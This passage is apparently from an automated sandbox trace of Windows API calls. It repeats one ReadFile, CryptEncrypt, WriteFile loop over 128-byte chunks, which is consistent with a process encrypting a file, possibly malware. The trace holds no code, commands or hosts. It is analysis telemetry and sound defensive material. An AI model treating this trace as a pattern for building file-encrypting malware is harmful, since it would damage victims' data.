Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.075] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.076] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.076] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.076] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.076] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.077] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.077] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.077] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.077] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.077] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.077] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.078] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.078] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.078] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.078] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.078] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.078] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.079] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.079] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.079] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.079] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.079] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.080] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.080] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.080] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.080] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.080] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.080] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.081] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.081] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.081] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.081] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.081] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.081] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.082] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.082] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.082] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.082] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.082] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.082] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.083] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.083] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.083] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, 